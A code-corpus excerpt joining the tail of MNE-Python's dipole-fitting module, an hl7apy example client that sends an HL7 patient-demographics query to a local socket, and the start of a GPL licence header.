for ti, t in enumerate(dip.times):
fid.write(np.zeros(1, '>i4').tobytes()) # int dipole
fid.write(np.array([t, 0]).astype('>f4').tobytes())
fid.write(np.zeros(3, '>f4').tobytes()) # r0
fid.write(dip.pos[ti].astype('>f4').tobytes()) # pos
Q = dip.amplitude[ti] * dip.ori[ti]
fid.write(Q.astype('>f4').tobytes())
fid.write(np.array(dip.gof[ti] / 100., '>f4').tobytes())
has_errors = int(bool(len(dip.conf)))
fid.write(np.array(has_errors, '>i4').tobytes()) # has_errors
fid.write(np.zeros(1, '>f4').tobytes()) # noise level
for key in _BDIP_ERROR_KEYS:
val = dip.conf[key][ti] if key in dip.conf else 0.
assert val.shape == ()
fid.write(np.array(val, '>f4').tobytes())
fid.write(np.zeros(25, '>f4').tobytes())
conf = dip.conf['vol'][ti] if 'vol' in dip.conf else 0.
fid.write(np.array(conf, '>f4').tobytes())
khi2 = dip.khi2[ti] if dip.khi2 is not None else 0
fid.write(np.array(khi2, '>f4').tobytes())
fid.write(np.zeros(1, '>f4').tobytes()) # prob
fid.write(np.zeros(1, '>f4').tobytes()) # total noise est
# #############################################################################
# Fitting
def _dipole_forwards(fwd_data, whitener, rr, n_jobs=1):
"""Compute the forward solution and do other nice stuff."""
B = _compute_forwards_meeg(rr, fwd_data, n_jobs, silent=True)
B = np.concatenate(B, axis=1)
assert np.isfinite(B).all()
B_orig = B.copy()
# Apply projection and whiten (cov has projections already)
_, _, dgemm = _get_ddot_dgemv_dgemm()
B = dgemm(1., B, whitener.T)
# column normalization doesn't affect our fitting, so skip for now
# S = np.sum(B * B, axis=1) # across channels
# scales = np.repeat(3. / np.sqrt(np.sum(np.reshape(S, (len(rr), 3)),
# axis=1)), 3)
# B *= scales[:, np.newaxis]
scales = np.ones(3)
return B, B_orig, scales
@verbose
def _make_guesses(surf, grid, exclude, mindist, n_jobs=1, verbose=None):
"""Make a guess space inside a sphere or BEM surface."""
if 'rr' in surf:
logger.info('Guess surface (%s) is in %s coordinates'
% (_bem_surf_name[surf['id']],
_coord_frame_name(surf['coord_frame'])))
else:
logger.info('Making a spherical guess space with radius %7.1f mm...'
% (1000 * surf['R']))
logger.info('Filtering (grid = %6.f mm)...' % (1000 * grid))
src = _make_volume_source_space(surf, grid, exclude, 1000 * mindist,
do_neighbors=False, n_jobs=n_jobs)[0]
assert 'vertno' in src
# simplify the result to make things easier later
src = dict(rr=src['rr'][src['vertno']], nn=src['nn'][src['vertno']],
nuse=src['nuse'], coord_frame=src['coord_frame'],
vertno=np.arange(src['nuse']), type='discrete')
return SourceSpaces([src])
def _fit_eval(rd, B, B2, fwd_svd=None, fwd_data=None, whitener=None,
lwork=None):
"""Calculate the residual sum of squares."""
if fwd_svd is None:
fwd = _dipole_forwards(fwd_data, whitener, rd[np.newaxis, :])[0]
uu, sing, vv = _repeated_svd(fwd, lwork, overwrite_a=True)
else:
uu, sing, vv = fwd_svd
gof = _dipole_gof(uu, sing, vv, B, B2)[0]
# mne-c uses fitness=B2-Bm2, but ours (1-gof) is just a normalized version
return 1. - gof
@functools.lru_cache(None)
def _get_ddot_dgemv_dgemm():
return _get_blas_funcs(np.float64, ('dot', 'gemv', 'gemm'))
def _dipole_gof(uu, sing, vv, B, B2):
"""Calculate the goodness of fit from the forward SVD."""
ddot, dgemv, _ = _get_ddot_dgemv_dgemm()
ncomp = 3 if sing[2] / (sing[0] if sing[0] > 0 else 1.) > 0.2 else 2
one = dgemv(1., vv[:ncomp], B) # np.dot(vv[:ncomp], B)
Bm2 = ddot(one, one) # np.sum(one * one)
gof = Bm2 / B2
return gof, one
def _fit_Q(fwd_data, whitener, B, B2, B_orig, rd, ori=None):
"""Fit the dipole moment once the location is known."""
from scipy import linalg
if 'fwd' in fwd_data:
# should be a single precomputed "guess" (i.e., fixed position)
assert rd is None
fwd = fwd_data['fwd']
assert fwd.shape[0] == 3
fwd_orig = fwd_data['fwd_orig']
assert fwd_orig.shape[0] == 3
scales = fwd_data['scales']
assert scales.shape == (3,)
fwd_svd = fwd_data['fwd_svd'][0]
else:
fwd, fwd_orig, scales = _dipole_forwards(fwd_data, whitener,
rd[np.newaxis, :])
fwd_svd = None
if ori is None:
if fwd_svd is None:
fwd_svd = linalg.svd(fwd, full_matrices=False)
uu, sing, vv = fwd_svd
gof, one = _dipole_gof(uu, sing, vv, B, B2)
ncomp = len(one)
one /= sing[:ncomp]
Q = np.dot(one, uu.T[:ncomp])
else:
fwd = np.dot(ori[np.newaxis], fwd)
sing = np.linalg.norm(fwd)
one = np.dot(fwd / sing, B)
gof = (one * one)[0] / B2
Q = ori * np.sum(one / sing)
ncomp = 3
# Counteract the effect of column normalization
Q *= scales[0]
B_residual_noproj = B_orig - np.dot(fwd_orig.T, Q)
return Q, gof, B_residual_noproj, ncomp
def _fit_dipoles(fun, min_dist_to_inner_skull, data, times, guess_rrs,
guess_data, fwd_data, whitener, ori, n_jobs, rank):
"""Fit a single dipole to the given whitened, projected data."""
from scipy.optimize import fmin_cobyla
parallel, p_fun, _ = parallel_func(fun, n_jobs)
# parallel over time points
res = parallel(p_fun(min_dist_to_inner_skull, B, t, guess_rrs,
guess_data, fwd_data, whitener,
fmin_cobyla, ori, rank)
for B, t in zip(data.T, times))
pos = np.array([r[0] for r in res])
amp = np.array([r[1] for r in res])
ori = np.array([r[2] for r in res])
gof = np.array([r[3] for r in res]) * 100 # convert to percentage
conf = None
if res[0][4] is not None:
conf = np.array([r[4] for r in res])
keys = ['vol', 'depth', 'long', 'trans', 'qlong', 'qtrans']
conf = {key: conf[:, ki] for ki, key in enumerate(keys)}
khi2 = np.array([r[5] for r in res])
nfree = np.array([r[6] for r in res])
residual_noproj = np.array([r[7] for r in res]).T
return pos, amp, ori, gof, conf, khi2, nfree, residual_noproj
'''Simplex code in case we ever want/need it for testing
def _make_tetra_simplex():
"""Make the initial tetrahedron"""
#
# For this definition of a regular tetrahedron, see
#
# http://mathworld.wolfram.com/Tetrahedron.html
#
x = np.sqrt(3.0) / 3.0
r = np.sqrt(6.0) / 12.0
R = 3 * r
d = x / 2.0
simplex = 1e-2 * np.array([[x, 0.0, -r],
[-d, 0.5, -r],
[-d, -0.5, -r],
[0., 0., R]])
return simplex
def try_(p, y, psum, ndim, fun, ihi, neval, fac):
"""Helper to try a value"""
ptry = np.empty(ndim)
fac1 = (1.0 - fac) / ndim
fac2 = fac1 - fac
ptry = psum * fac1 - p[ihi] * fac2
ytry = fun(ptry)
neval += 1
if ytry < y[ihi]:
y[ihi] = ytry
psum[:] += ptry - p[ihi]
p[ihi] = ptry
return ytry, neval
def _simplex_minimize(p, ftol, stol, fun, max_eval=1000):
"""Minimization with the simplex algorithm
Modified from Numerical recipes"""
y = np.array([fun(s) for s in p])
ndim = p.shape[1]
assert p.shape[0] == ndim + 1
mpts = ndim + 1
neval = 0
psum = p.sum(axis=0)
loop = 1
while(True):
ilo = 1
if y[1] > y[2]:
ihi = 1
inhi = 2
else:
ihi = 2
inhi = 1
for i in range(mpts):
if y[i] < y[ilo]:
ilo = i
if y[i] > y[ihi]:
inhi = ihi
ihi = i
elif y[i] > y[inhi]:
if i != ihi:
inhi = i
rtol = 2 * np.abs(y[ihi] - y[ilo]) / (np.abs(y[ihi]) + np.abs(y[ilo]))
if rtol < ftol:
break
if neval >= max_eval:
raise RuntimeError('Maximum number of evaluations exceeded.')
if stol > 0: # Has the simplex collapsed?
dsum = np.sqrt(np.sum((p[ilo] - p[ihi]) ** 2))
if loop > 5 and dsum < stol:
break
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, -1.)
if ytry <= y[ilo]:
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, 2.)
elif ytry >= y[inhi]:
ysave = y[ihi]
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, 0.5)
if ytry >= ysave:
for i in range(mpts):
if i != ilo:
psum[:] = 0.5 * (p[i] + p[ilo])
p[i] = psum
y[i] = fun(psum)
neval += ndim
psum = p.sum(axis=0)
loop += 1
'''
def _fit_confidence(rd, Q, ori, whitener, fwd_data):
# As describedd in the Xfit manual, confidence intervals can be calculated
# by examining a linearization of model at the best-fitting location,
# i.e. taking the Jacobian and using the whitener:
#
# J = [∂b/∂x ∂b/∂y ∂b/∂z ∂b/∂Qx ∂b/∂Qy ∂b/∂Qz]
# C = (J.T C^-1 J)^-1
#
# And then the confidence interval is the diagonal of C, scaled by 1.96
# (for 95% confidence).
from scipy import linalg
direction = np.empty((3, 3))
# The coordinate system has the x axis aligned with the dipole orientation,
direction[0] = ori
# the z axis through the origin of the sphere model
rvec = rd - fwd_data['inner_skull']['r0']
direction[2] = rvec - ori * np.dot(ori, rvec) # orthogonalize
direction[2] /= np.linalg.norm(direction[2])
# and the y axis perpendical with these forming a right-handed system.
direction[1] = np.cross(direction[2], direction[0])
assert np.allclose(np.dot(direction, direction.T), np.eye(3))
# Get spatial deltas in dipole coordinate directions
deltas = (-1e-4, 1e-4)
J = np.empty((whitener.shape[0], 6))
for ii in range(3):
fwds = []
for delta in deltas:
this_r = rd[np.newaxis] + delta * direction[ii]
fwds.append(
np.dot(Q, _dipole_forwards(fwd_data, whitener, this_r)[0]))
J[:, ii] = np.diff(fwds, axis=0)[0] / np.diff(deltas)[0]
# Get current (Q) deltas in the dipole directions
deltas = np.array([-0.01, 0.01]) * np.linalg.norm(Q)
this_fwd = _dipole_forwards(fwd_data, whitener, rd[np.newaxis])[0]
for ii in range(3):
fwds = []
for delta in deltas:
fwds.append(np.dot(Q + delta * direction[ii], this_fwd))
J[:, ii + 3] = np.diff(fwds, axis=0)[0] / np.diff(deltas)[0]
# J is already whitened, so we don't need to do np.dot(whitener, J).
# However, the units in the Jacobian are potentially quite different,
# so we need to do some normalization during inversion, then revert.
direction_norm = np.linalg.norm(J[:, :3])
Q_norm = np.linalg.norm(J[:, 3:5]) # omit possible zero Z
norm = np.array([direction_norm] * 3 + [Q_norm] * 3)
J /= norm
J = np.dot(J.T, J)
C = linalg.pinvh(J, rcond=1e-14)
C /= norm
C /= norm[:, np.newaxis]
conf = 1.96 * np.sqrt(np.diag(C))
# The confidence volume of the dipole location is obtained from by
# taking the eigenvalues of the upper left submatrix and computing
# v = 4π/3 √(c^3 λ1 λ2 λ3) with c = 7.81, or:
vol_conf = 4 * np.pi / 3. * np.sqrt(
476.379541 * np.prod(linalg.eigh(C[:3, :3], eigvals_only=True)))
conf = np.concatenate([conf, [vol_conf]])
# Now we reorder and subselect the proper columns:
# vol, depth, long, trans, Qlong, Qtrans (discard Qdepth, assumed zero)
conf = conf[[6, 2, 0, 1, 3, 4]]
return conf
def _surface_constraint(rd, surf, min_dist_to_inner_skull):
"""Surface fitting constraint."""
dist = _compute_nearest(surf['rr'], rd[np.newaxis, :],
return_dists=True)[1][0]
if _points_outside_surface(rd[np.newaxis, :], surf, 1)[0]:
dist *= -1.
# Once we know the dipole is below the inner skull,
# let's check if its distance to the inner skull is at least
# min_dist_to_inner_skull. This can be enforced by adding a
# constrain proportional to its distance.
dist -= min_dist_to_inner_skull
return dist
def _sphere_constraint(rd, r0, R_adj):
"""Sphere fitting constraint."""
return R_adj - np.sqrt(np.sum((rd - r0) ** 2))
def _fit_dipole(min_dist_to_inner_skull, B_orig, t, guess_rrs,
guess_data, fwd_data, whitener, fmin_cobyla, ori, rank):
"""Fit a single bit of data."""
B = np.dot(whitener, B_orig)
# make constraint function to keep the solver within the inner skull
if 'rr' in fwd_data['inner_skull']: # bem
surf = fwd_data['inner_skull']
constraint = partial(_surface_constraint, surf=surf,
min_dist_to_inner_skull=min_dist_to_inner_skull)
else: # sphere
surf = None
constraint = partial(
_sphere_constraint, r0=fwd_data['inner_skull']['r0'],
R_adj=fwd_data['inner_skull']['R'] - min_dist_to_inner_skull)
# Find a good starting point (find_best_guess in C)
B2 = np.dot(B, B)
if B2 == 0:
warn('Zero field found for time %s' % t)
return np.zeros(3), 0, np.zeros(3), 0, B
idx = np.argmin([_fit_eval(guess_rrs[[fi], :], B, B2, fwd_svd)
for fi, fwd_svd in enumerate(guess_data['fwd_svd'])])
x0 = guess_rrs[idx]
lwork = _svd_lwork((3, B.shape[0]))
fun = partial(_fit_eval, B=B, B2=B2, fwd_data=fwd_data, whitener=whitener,
lwork=lwork)
# Tested minimizers:
# Simplex, BFGS, CG, COBYLA, L-BFGS-B, Powell, SLSQP, TNC
# Several were similar, but COBYLA won for having a handy constraint
# function we can use to ensure we stay inside the inner skull /
# smallest sphere
rd_final = fmin_cobyla(fun, x0, (constraint,), consargs=(),
rhobeg=5e-2, rhoend=5e-5, disp=False)
# simplex = _make_tetra_simplex() + x0
# _simplex_minimize(simplex, 1e-4, 2e-4, fun)
# rd_final = simplex[0]
# Compute the dipole moment at the final point
Q, gof, residual_noproj, n_comp = _fit_Q(
fwd_data, whitener, B, B2, B_orig, rd_final, ori=ori)
khi2 = (1 - gof) * B2
nfree = rank - n_comp
amp = np.sqrt(np.dot(Q, Q))
norm = 1. if amp == 0. else amp
ori = Q / norm
conf = _fit_confidence(rd_final, Q, ori, whitener, fwd_data)
msg = '---- Fitted : %7.1f ms' % (1000. * t)
if surf is not None:
dist_to_inner_skull = _compute_nearest(
surf['rr'], rd_final[np.newaxis, :], return_dists=True)[1][0]
msg += (", distance to inner skull : %2.4f mm"
% (dist_to_inner_skull * 1000.))
logger.info(msg)
return rd_final, amp, ori, gof, conf, khi2, nfree, residual_noproj
def _fit_dipole_fixed(min_dist_to_inner_skull, B_orig, t, guess_rrs,
guess_data, fwd_data, whitener,
fmin_cobyla, ori, rank):
"""Fit a data using a fixed position."""
B = np.dot(whitener, B_orig)
B2 = np.dot(B, B)
if B2 == 0:
warn('Zero field found for time %s' % t)
return np.zeros(3), 0, np.zeros(3), 0, np.zeros(6)
# Compute the dipole moment
Q, gof, residual_noproj = _fit_Q(guess_data, whitener, B, B2, B_orig,
rd=None, ori=ori)[:3]
if ori is None:
amp = np.sqrt(np.dot(Q, Q))
norm = 1. if amp == 0. else amp
ori = Q / norm
else:
amp = np.dot(Q, ori)
rd_final = guess_rrs[0]
# This will be slow, and we don't use it anyway, so omit it for now:
# conf = _fit_confidence(rd_final, Q, ori, whitener, fwd_data)
conf = khi2 = nfree = None
# No corresponding 'logger' message here because it should go *very* fast
return rd_final, amp, ori, gof, conf, khi2, nfree, residual_noproj
@verbose
def fit_dipole(evoked, cov, bem, trans=None, min_dist=5., n_jobs=1,
pos=None, ori=None, rank=None, verbose=None):
"""Fit a dipole.
Parameters
----------
evoked : instance of Evoked
The dataset to fit.
cov : str | instance of Covariance
The noise covariance.
bem : str | instance of ConductorModel
The BEM filename (str) or conductor model.
trans : str | None
The head<->MRI transform filename. Must be provided unless BEM
is a sphere model.
min_dist : float
Minimum distance (in millimeters) from the dipole to the inner skull.
Must be positive. Note that because this is a constraint passed to
a solver it is not strict but close, i.e. for a ``min_dist=5.`` the
fits could be 4.9 mm from the inner skull.
%(n_jobs)s
It is used in field computation and fitting.
pos : ndarray, shape (3,) | None
Position of the dipole to use. If None (default), sequential
fitting (different position and orientation for each time instance)
is performed. If a position (in head coords) is given as an array,
the position is fixed during fitting.
.. versionadded:: 0.12
ori : ndarray, shape (3,) | None
Orientation of the dipole to use. If None (default), the
orientation is free to change as a function of time. If an
orientation (in head coordinates) is given as an array, ``pos``
must also be provided, and the routine computes the amplitude and
goodness of fit of the dipole at the given position and orientation
for each time instant.
.. versionadded:: 0.12
%(rank_None)s
.. versionadded:: 0.20
%(verbose)s
Returns
-------
dip : instance of Dipole or DipoleFixed
The dipole fits. A :class:`mne.DipoleFixed` is returned if
``pos`` and ``ori`` are both not None, otherwise a
:class:`mne.Dipole` is returned.
residual : instance of Evoked
The M-EEG data channels with the fitted dipolar activity removed.
See Also
--------
mne.beamformer.rap_music
Dipole
DipoleFixed
read_dipole
Notes
-----
.. versionadded:: 0.9.0
"""
from scipy import linalg
# This could eventually be adapted to work with other inputs, these
# are what is needed:
evoked = evoked.copy()
# Determine if a list of projectors has an average EEG ref
if _needs_eeg_average_ref_proj(evoked.info):
raise ValueError('EEG average reference is mandatory for dipole '
'fitting.')
if min_dist < 0:
raise ValueError('min_dist should be positive. Got %s' % min_dist)
if ori is not None and pos is None:
raise ValueError('pos must be provided if ori is not None')
data = evoked.data
if not np.isfinite(data).all():
raise ValueError('Evoked data must be finite')
info = evoked.info
times = evoked.times.copy()
comment = evoked.comment
# Convert the min_dist to meters
min_dist_to_inner_skull = min_dist / 1000.
del min_dist
# Figure out our inputs
neeg = len(pick_types(info, meg=False, eeg=True, ref_meg=False,
exclude=[]))
if isinstance(bem, str):
bem_extra = bem
else:
bem_extra = repr(bem)
logger.info('BEM : %s' % bem_extra)
mri_head_t, trans = _get_trans(trans)
logger.info('MRI transform : %s' % trans)
bem = _setup_bem(bem, bem_extra, neeg, mri_head_t, verbose=False)
if not bem['is_sphere']:
# Find the best-fitting sphere
inner_skull = _bem_find_surface(bem, 'inner_skull')
inner_skull = inner_skull.copy()
R, r0 = _fit_sphere(inner_skull['rr'], disp=False)
# r0 back to head frame for logging
r0 = apply_trans(mri_head_t['trans'], r0[np.newaxis, :])[0]
inner_skull['r0'] = r0
logger.info('Head origin : '
'%6.1f %6.1f %6.1f mm rad = %6.1f mm.'
% (1000 * r0[0], 1000 * r0[1], 1000 * r0[2], 1000 * R))
del R, r0
else:
r0 = bem['r0']
if len(bem.get('layers', [])) > 0:
R = bem['layers'][0]['rad']
kind = 'rad'
else: # MEG-only
# Use the minimum distance to the MEG sensors as the radius then
R = np.dot(np.linalg.inv(info['dev_head_t']['trans']),
np.hstack([r0, [1.]]))[:3] # r0 -> device
R = R - [info['chs'][pick]['loc'][:3]
for pick in pick_types(info, meg=True, exclude=[])]
if len(R) == 0:
raise RuntimeError('No MEG channels found, but MEG-only '
'sphere model used')
R = np.min(np.sqrt(np.sum(R * R, axis=1))) # use dist to sensors
kind = 'max_rad'
logger.info('Sphere model : origin at (% 7.2f % 7.2f % 7.2f) mm, '
'%s = %6.1f mm'
% (1000 * r0[0], 1000 * r0[1], 1000 * r0[2], kind, R))
inner_skull = dict(R=R, r0=r0) # NB sphere model defined in head frame
del R, r0
accurate = False # can be an option later (shouldn't make big diff)
# Deal with DipoleFixed cases here
if pos is not None:
fixed_position = True
pos = np.array(pos, float)
if pos.shape != (3,):
raise ValueError('pos must be None or a 3-element array-like,'
' got %s' % (pos,))
logger.info('Fixed position : %6.1f %6.1f %6.1f mm'
% tuple(1000 * pos))
if ori is not None:
ori = np.array(ori, float)
if ori.shape != (3,):
raise ValueError('oris must be None or a 3-element array-like,'
' got %s' % (ori,))
norm = np.sqrt(np.sum(ori * ori))
if not np.isclose(norm, 1):
raise ValueError('ori must be a unit vector, got length %s'
% (norm,))
logger.info('Fixed orientation : %6.4f %6.4f %6.4f mm'
% tuple(ori))
else:
logger.info('Free orientation : <time-varying>')
fit_n_jobs = 1 # only use 1 job to do the guess fitting
else:
fixed_position = False
# Eventually these could be parameters, but they are just used for
# the initial grid anyway
guess_grid = 0.02 # MNE-C uses 0.01, but this is faster w/similar perf
guess_mindist = max(0.005, min_dist_to_inner_skull)
guess_exclude = 0.02
logger.info('Guess grid : %6.1f mm' % (1000 * guess_grid,))
if guess_mindist > 0.0:
logger.info('Guess mindist : %6.1f mm'
% (1000 * guess_mindist,))
if guess_exclude > 0:
logger.info('Guess exclude : %6.1f mm'
% (1000 * guess_exclude,))
logger.info('Using %s MEG coil definitions.'
% ("accurate" if accurate else "standard"))
fit_n_jobs = n_jobs
if isinstance(cov, str):
logger.info('Noise covariance : %s' % (cov,))
cov = read_cov(cov, verbose=False)
logger.info('')
_print_coord_trans(mri_head_t)
_print_coord_trans(info['dev_head_t'])
logger.info('%d bad channels total' % len(info['bads']))
# Forward model setup (setup_forward_model from setup.c)
ch_types = evoked.get_channel_types()
megcoils, compcoils, megnames, meg_info = [], [], [], None
eegels, eegnames = [], []
if 'grad' in ch_types or 'mag' in ch_types:
megcoils, compcoils, megnames, meg_info = \
_prep_meg_channels(info, exclude='bads',
accurate=accurate, verbose=verbose)
if 'eeg' in ch_types:
eegels, eegnames = _prep_eeg_channels(info, exclude='bads',
verbose=verbose)
# Ensure that MEG and/or EEG channels are present
if len(megcoils + eegels) == 0:
raise RuntimeError('No MEG or EEG channels found.')
# Whitener for the data
logger.info('Decomposing the sensor noise covariance matrix...')
picks = pick_types(info, meg=True, eeg=True, ref_meg=False)
# In case we want to more closely match MNE-C for debugging:
# from .io.pick import pick_info
# from .cov import prepare_noise_cov
# info_nb = pick_info(info, picks)
# cov = prepare_noise_cov(cov, info_nb, info_nb['ch_names'], verbose=False)
# nzero = (cov['eig'] > 0)
# n_chan = len(info_nb['ch_names'])
# whitener = np.zeros((n_chan, n_chan), dtype=np.float64)
# whitener[nzero, nzero] = 1.0 / np.sqrt(cov['eig'][nzero])
# whitener = np.dot(whitener, cov['eigvec'])
whitener, _, rank = compute_whitener(cov, info, picks=picks,
rank=rank, return_rank=True)
# Proceed to computing the fits (make_guess_data)
if fixed_position:
guess_src = dict(nuse=1, rr=pos[np.newaxis], inuse=np.array([True]))
logger.info('Compute forward for dipole location...')
else:
logger.info('\n---- Computing the forward solution for the guesses...')
guess_src = _make_guesses(inner_skull, guess_grid, guess_exclude,
guess_mindist, n_jobs=n_jobs)[0]
# grid coordinates go from mri to head frame
transform_surface_to(guess_src, 'head', mri_head_t)
logger.info('Go through all guess source locations...')
# inner_skull goes from mri to head frame
if 'rr' in inner_skull:
transform_surface_to(inner_skull, 'head', mri_head_t)
if fixed_position:
if 'rr' in inner_skull:
check = _surface_constraint(pos, inner_skull,
min_dist_to_inner_skull)
else:
check = _sphere_constraint(
pos, inner_skull['r0'],
R_adj=inner_skull['R'] - min_dist_to_inner_skull)
if check <= 0:
raise ValueError('fixed position is %0.1fmm outside the inner '
'skull boundary' % (-1000 * check,))
# C code computes guesses w/sphere model for speed, don't bother here
fwd_data = dict(coils_list=[megcoils, eegels], infos=[meg_info, None],
ccoils_list=[compcoils, None], coil_types=['meg', 'eeg'],
inner_skull=inner_skull)
# fwd_data['inner_skull'] in head frame, bem in mri, confusing...
_prep_field_computation(guess_src['rr'], bem, fwd_data, n_jobs,
verbose=False)
guess_fwd, guess_fwd_orig, guess_fwd_scales = _dipole_forwards(
fwd_data, whitener, guess_src['rr'], n_jobs=fit_n_jobs)
# decompose ahead of time
guess_fwd_svd = [linalg.svd(fwd, full_matrices=False)
for fwd in np.array_split(guess_fwd,
len(guess_src['rr']))]
guess_data = dict(fwd=guess_fwd, fwd_svd=guess_fwd_svd,
fwd_orig=guess_fwd_orig, scales=guess_fwd_scales)
del guess_fwd, guess_fwd_svd, guess_fwd_orig, guess_fwd_scales # destroyed
logger.info('[done %d source%s]' % (guess_src['nuse'],
_pl(guess_src['nuse'])))
# Do actual fits
data = data[picks]
ch_names = [info['ch_names'][p] for p in picks]
proj_op = make_projector(info['projs'], ch_names, info['bads'])[0]
fun = _fit_dipole_fixed if fixed_position else _fit_dipole
out = _fit_dipoles(
fun, min_dist_to_inner_skull, data, times, guess_src['rr'],
guess_data, fwd_data, whitener, ori, n_jobs, rank)
assert len(out) == 8
if fixed_position and ori is not None:
# DipoleFixed
data = np.array([out[1], out[3]])
out_info = deepcopy(info)
loc = np.concatenate([pos, ori, np.zeros(6)])
out_info['chs'] = [
dict(ch_name='dip 01', loc=loc, kind=FIFF.FIFFV_DIPOLE_WAVE,
coord_frame=FIFF.FIFFV_COORD_UNKNOWN, unit=FIFF.FIFF_UNIT_AM,
coil_type=FIFF.FIFFV_COIL_DIPOLE,
unit_mul=0, range=1, cal=1., scanno=1, logno=1),
dict(ch_name='goodness', loc=np.full(12, np.nan),
kind=FIFF.FIFFV_GOODNESS_FIT, unit=FIFF.FIFF_UNIT_AM,
coord_frame=FIFF.FIFFV_COORD_UNKNOWN,
coil_type=FIFF.FIFFV_COIL_NONE,
unit_mul=0, range=1., cal=1., scanno=2, logno=100)]
for key in ['hpi_meas', 'hpi_results', 'projs']:
out_info[key] = list()
for key in ['acq_pars', 'acq_stim', 'description', 'dig',
'experimenter', 'hpi_subsystem', 'proj_id', 'proj_name',
'subject_info']:
out_info[key] = None
out_info['bads'] = []
out_info._update_redundant()
out_info._check_consistency()
dipoles = DipoleFixed(out_info, data, times, evoked.nave,
evoked._aspect_kind, comment=comment)
else:
dipoles = Dipole(times, out[0], out[1], out[2], out[3], comment,
out[4], out[5], out[6])
residual = evoked.copy().apply_proj() # set the projs active
residual.data[picks] = np.dot(proj_op, out[-1])
logger.info('%d time points fitted' % len(dipoles.times))
return dipoles, residual
def get_phantom_dipoles(kind='vectorview'):
"""Get standard phantom dipole locations and orientations.
Parameters
----------
kind : str
Get the information for the given system:
``vectorview`` (default)
The Neuromag VectorView phantom.
``otaniemi``
The older Neuromag phantom used at Otaniemi.
Returns
-------
pos : ndarray, shape (n_dipoles, 3)
The dipole positions.
ori : ndarray, shape (n_dipoles, 3)
The dipole orientations.
Notes
-----
The Elekta phantoms have a radius of 79.5mm, and HPI coil locations
in the XY-plane at the axis extrema (e.g., (79.5, 0), (0, -79.5), ...).
"""
_check_option('kind', kind, ['vectorview', 'otaniemi'])
if kind == 'vectorview':
# these values were pulled from a scanned image provided by
# Elekta folks
a = np.array([59.7, 48.6, 35.8, 24.8, 37.2, 27.5, 15.8, 7.9])
b = np.array([46.1, 41.9, 38.3, 31.5, 13.9, 16.2, 20.0, 19.3])
x = np.concatenate((a, [0] * 8, -b, [0] * 8))
y = np.concatenate(([0] * 8, -a, [0] * 8, b))
c = [22.9, 23.5, 25.5, 23.1, 52.0, 46.4, 41.0, 33.0]
d = [44.4, 34.0, 21.6, 12.7, 62.4, 51.5, 39.1, 27.9]
z = np.concatenate((c, c, d, d))
signs = ([1, -1] * 4 + [-1, 1] * 4) * 2
elif kind == 'otaniemi':
# these values were pulled from an Neuromag manual
# (NM20456A, 13.7.1999, p.65)
a = np.array([56.3, 47.6, 39.0, 30.3])
b = np.array([32.5, 27.5, 22.5, 17.5])
c = np.zeros(4)
x = np.concatenate((a, b, c, c, -a, -b, c, c))
y = np.concatenate((c, c, -a, -b, c, c, b, a))
z = np.concatenate((b, a, b, a, b, a, a, b))
signs = [-1] * 8 + [1] * 16 + [-1] * 8
pos = np.vstack((x, y, z)).T / 1000.
# Locs are always in XZ or YZ, and so are the oris. The oris are
# also in the same plane and tangential, so it's easy to determine
# the orientation.
ori = list()
for pi, this_pos in enumerate(pos):
this_ori = np.zeros(3)
idx = np.where(this_pos == 0)[0]
# assert len(idx) == 1
idx = np.setdiff1d(np.arange(3), idx[0])
this_ori[idx] = (this_pos[idx][::-1] /
np.linalg.norm(this_pos[idx])) * [1, -1]
this_ori *= signs[pi]
# Now we have this quality, which we could uncomment to
# double-check:
# np.testing.assert_allclose(np.dot(this_ori, this_pos) /
# np.linalg.norm(this_pos), 0,
# atol=1e-15)
ori.append(this_ori)
ori = np.array(ori)
return pos, ori
def _concatenate_dipoles(dipoles):
"""Concatenate a list of dipoles."""
times, pos, amplitude, ori, gof = [], [], [], [], []
for dipole in dipoles:
times.append(dipole.times)
pos.append(dipole.pos)
amplitude.append(dipole.amplitude)
ori.append(dipole.ori)
gof.append(dipole.gof)
return Dipole(np.concatenate(times), np.concatenate(pos),
np.concatenate(amplitude), np.concatenate(ori),
np.concatenate(gof), name=None)
|
kambysese/mne-python
|
mne/dipole.py
|
Python
|
bsd-3-clause
| 57,802
| 0.000017
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012-2018, CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket
from hl7apy.parser import parse_message
def query(host, port):
msg = \
'MSH|^~\&|REC APP|REC FAC|SEND APP|SEND FAC|20110708163513||QBP^Q22^QBP_Q21|111069|D|2.5|||||ITA||EN\r' \
'QPD|IHE PDQ Query|111069|@PID.5.2^SMITH||||\r' \
'RCP|I|'
# establish the connection
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
# send the message
sock.sendall(parse_message(msg).to_mllp().encode('UTF-8'))
# receive the answer
received = sock.recv(1024*1024)
return received
finally:
sock.close()
if __name__ == '__main__':
res = query('localhost', 6789)
print("Received response: ")
print(repr(res))
|
crs4/hl7apy
|
examples/iti_21/client.py
|
Python
|
mit
| 1,870
| 0.004813
|
#
#
# Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
